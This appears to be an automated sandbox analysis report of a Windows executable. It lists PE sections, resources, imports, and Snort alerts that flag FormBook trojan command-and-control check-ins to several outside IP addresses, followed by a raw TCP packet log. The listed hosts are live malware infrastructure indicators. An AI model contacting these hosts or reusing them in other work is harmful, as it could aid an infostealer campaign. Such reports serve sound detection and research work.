                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa80000x6230.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xa70000x18.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xa37740x634.idata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                        Sections

                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x10000x6c6d00x6c800False0.5343349474366359data6.574486068299734IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .itext0x6e0000x8040xa00False0.5125data5.495016511395614IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .data0x6f0000x2f5180x2f600False0.5352490105540897data7.287870053980081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .bss0x9f0000x37f80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .idata0xa30000x28040x2a00False0.3078497023809524data4.926344413190151IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .tls0xa60000x340x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .rdata0xa70000x180x200False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0xa80000x62300x6400False0.638359375data6.654765582765188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rsrc0xaf0000xd2000xd200False0.10805431547619047data3.352529991615067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                        Resources

                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                        RT_CURSOR0xaf71c0x134dataEnglishUnited States
                                                                                                                                        RT_CURSOR0xaf8500x134dataEnglishUnited States
                                                                                                                                        RT_CURSOR0xaf9840x134dataEnglishUnited States
                                                                                                                                        RT_CURSOR0xafab80x134dataEnglishUnited States
                                                                                                                                        RT_CURSOR0xafbec0x134dataEnglishUnited States
                                                                                                                                        RT_CURSOR0xafd200x134dataEnglishUnited States
                                                                                                                                        RT_CURSOR0xafe540x134dataEnglishUnited States
                                                                                                                                        RT_ICON0xaff880x94a8data
                                                                                                                                        RT_ICON0xb94300x468GLS_BINARY_LSB_FIRST
                                                                                                                                        RT_STRING0xb98980x2f8data
                                                                                                                                        RT_STRING0xb9b900xbcdata
                                                                                                                                        RT_STRING0xb9c4c0x110data
                                                                                                                                        RT_STRING0xb9d5c0x4a0data
                                                                                                                                        RT_STRING0xba1fc0x348data
                                                                                                                                        RT_STRING0xba5440x394data
                                                                                                                                        RT_STRING0xba8d80x3f8data
                                                                                                                                        RT_STRING0xbacd00xf4data
                                                                                                                                        RT_STRING0xbadc40xc4data
                                                                                                                                        RT_STRING0xbae880x22cdata
                                                                                                                                        RT_STRING0xbb0b40x3b4data
                                                                                                                                        RT_STRING0xbb4680x368data
                                                                                                                                        RT_STRING0xbb7d00x2b8data
                                                                                                                                        RT_RCDATA0xbba880x10data
                                                                                                                                        RT_RCDATA0xbba980x2d8data
                                                                                                                                        RT_RCDATA0xbbd700x1e5Delphi compiled form 'TDuckForm'
                                                                                                                                        RT_GROUP_CURSOR0xbbf580x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                        RT_GROUP_CURSOR0xbbf6c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                        RT_GROUP_CURSOR0xbbf800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                        RT_GROUP_CURSOR0xbbf940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                        RT_GROUP_CURSOR0xbbfa80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                        RT_GROUP_CURSOR0xbbfbc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                        RT_GROUP_CURSOR0xbbfd00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                        RT_GROUP_ICON0xbbfe40x22data

                                                                                                                                        Imports

                                                                                                                                        DLLImport
                                                                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                        user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                        kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                        user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, ChangeDisplaySettingsA, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                        msimg32.dllTransparentBlt, AlphaBlend
                                                                                                                                        gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                        kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey, InitializeAcl
                                                                                                                                        kernel32.dllSleep
                                                                                                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                        comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                        URLAddMIMEFileTypesPS

                                                                                                                                        Possible Origin

                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                        EnglishUnited States

                                                                                                                                        Network Behavior

                                                                                                                                        Snort IDS Alerts

                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                        192.168.2.338.54.163.5749861802031449 08/08/22-20:15:40.535789TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986180192.168.2.338.54.163.57
                                                                                                                                        192.168.2.315.197.142.17349863802031453 08/08/22-20:16:21.818812TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986380192.168.2.315.197.142.173
                                                                                                                                        192.168.2.334.102.136.18049839802031449 08/08/22-20:14:24.056805TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.334.102.136.180
                                                                                                                                        192.168.2.338.54.163.5749861802031412 08/08/22-20:15:40.535789TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986180192.168.2.338.54.163.57
                                                                                                                                        192.168.2.315.197.142.17349863802031412 08/08/22-20:16:21.818812TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986380192.168.2.315.197.142.173
                                                                                                                                        192.168.2.338.54.163.5749861802031453 08/08/22-20:15:40.535789TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986180192.168.2.338.54.163.57
                                                                                                                                        192.168.2.3198.54.117.21849849802031453 08/08/22-20:14:29.416650TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.3198.54.117.218
                                                                                                                                        192.168.2.334.102.136.18049839802031453 08/08/22-20:14:24.056805TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.334.102.136.180
                                                                                                                                        192.168.2.334.102.136.18049839802031412 08/08/22-20:14:24.056805TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.334.102.136.180
                                                                                                                                        192.168.2.3198.54.117.21849849802031449 08/08/22-20:14:29.416650TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.3198.54.117.218
                                                                                                                                        192.168.2.32.57.90.1649850802031449 08/08/22-20:14:34.726453TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985080192.168.2.32.57.90.16
                                                                                                                                        192.168.2.3198.54.117.21849849802031412 08/08/22-20:14:29.416650TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.3198.54.117.218
                                                                                                                                        192.168.2.315.197.142.17349863802031449 08/08/22-20:16:21.818812TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986380192.168.2.315.197.142.173
                                                                                                                                        192.168.2.32.57.90.1649850802031453 08/08/22-20:14:34.726453TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985080192.168.2.32.57.90.16
                                                                                                                                        192.168.2.32.57.90.1649850802031412 08/08/22-20:14:34.726453TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985080192.168.2.32.57.90.16

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Aug 8, 2022 20:12:06.970721960 CEST49728443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:06.970777035 CEST4434972813.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:06.970897913 CEST49728443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:07.000993967 CEST49728443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:07.001035929 CEST4434972813.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:07.099013090 CEST4434972813.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:07.099107981 CEST49728443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:07.347546101 CEST49728443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:07.347594023 CEST4434972813.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:07.348143101 CEST4434972813.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:07.348376036 CEST49728443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:07.350692034 CEST49728443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:07.391401052 CEST4434972813.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:07.936290026 CEST4434972813.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:07.936433077 CEST4434972813.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:07.936461926 CEST49728443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:07.936553955 CEST49728443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:08.005918980 CEST49728443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:08.005959988 CEST4434972813.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:08.553364038 CEST49737443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:08.553414106 CEST4434973713.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:08.553508043 CEST49737443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:08.554105043 CEST49737443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:08.554135084 CEST4434973713.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:08.640991926 CEST4434973713.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:08.641114950 CEST49737443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:08.641644001 CEST49737443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:08.641664028 CEST4434973713.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:08.645796061 CEST49737443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:08.645817995 CEST4434973713.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:09.346910954 CEST4434973713.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:09.347021103 CEST4434973713.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:09.347054958 CEST49737443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:09.347173929 CEST49737443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:09.348762035 CEST49737443192.168.2.313.107.43.13
                                                                                                                                        Aug 8, 2022 20:12:09.348795891 CEST4434973713.107.43.13192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.505234957 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.505291939 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.505388975 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.506093979 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.506124973 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.589283943 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.589453936 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.591114044 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.591228008 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.667932987 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.667958975 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.668307066 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.668385983 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.669054031 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.711433887 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.921008110 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.921055079 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.921165943 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.921196938 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.921258926 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.921264887 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.921291113 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.921360016 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.921380043 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.921390057 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.921473980 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.921587944 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.921675920 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.921699047 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.921716928 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.921798944 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.923412085 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.923712969 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.923774004 CEST4434974613.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:29.923821926 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:29.923847914 CEST49746443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:30.650996923 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:30.651082993 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:30.651180983 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:30.651906967 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:30.651938915 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:30.742676973 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:30.742773056 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:30.743453979 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:30.743469954 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:30.748049974 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:30.748069048 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.014241934 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.014286995 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.014365911 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.014394045 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.014421940 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.014453888 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.014473915 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.014498949 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.014518976 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.018021107 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.156469107 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.156600952 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.156615019 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.156641960 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.156713963 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.156737089 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.156761885 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.156811953 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.156860113 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.156898975 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.156908035 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.156989098 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.157000065 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.157016993 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.157032967 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.157104969 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.157115936 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.157124043 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.158476114 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.182391882 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.182529926 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.182564974 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.182714939 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.299738884 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.299855947 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.299861908 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.299880981 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.299930096 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.299946070 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.299954891 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.299959898 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.300014019 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.300048113 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.300052881 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.300086021 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.300158024 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.300163984 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.300210953 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.300328970 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.300442934 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.300448895 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.300507069 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.300565004 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.300646067 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.300649881 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.300704002 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.442795992 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.442960978 CEST49748443192.168.2.313.107.43.12
                                                                                                                                        Aug 8, 2022 20:12:31.442987919 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.443013906 CEST4434974813.107.43.12192.168.2.3
                                                                                                                                        Aug 8, 2022 20:12:31.443108082 CEST49748443192.168.2.313.107.43.12
